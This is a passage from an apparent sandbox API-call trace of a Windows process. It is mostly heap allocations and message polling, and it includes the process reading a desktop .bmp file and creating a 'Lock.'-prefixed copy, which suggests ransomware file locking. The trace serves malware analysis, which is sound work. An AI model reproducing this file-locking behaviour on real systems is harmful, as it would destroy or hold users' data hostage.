dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0164.657] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.657] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.657] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.657] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0164.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0164.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/FN4XiavIO4PR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fn4xiavio4pr.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0164.657] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.657] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0164.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0164.658] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.658] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.658] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0164.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0164.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0164.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.658] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.FN4XiavIO4PR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.fn4xiavio4pr.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0164.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0164.659] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0164.659] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.660] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0164.660] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0164.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0164.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.660] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0164.660] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x20b1, lpOverlapped=0x0) returned 1 [0164.661] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0164.661] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0164.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0164.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20b1) returned 0x34a2048 [0164.661] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0164.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0164.661] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0164.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0164.662] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0164.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0164.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20b1) returned 0x34a2048 [0164.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0164.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c18 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0164.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0164.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0164.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0164.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20b1) returned 0x34a61c8 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0164.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0164.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0164.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0164.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0164.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0164.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0164.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0164.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0164.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0164.664] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0164.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0164.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0164.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.664] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0164.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0164.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0164.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0164.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0164.665] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0164.665] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0164.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0164.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.665] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0164.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0164.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0164.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0164.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0164.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0164.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0164.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.666] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0164.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0164.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0164.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0164.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0164.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0164.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0164.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0164.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0164.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.667] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0164.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0164.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0164.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0164.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0164.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.668] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0164.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0164.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0164.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0164.669] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0164.669] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0164.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0164.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0164.669] PeekMessageW (in: 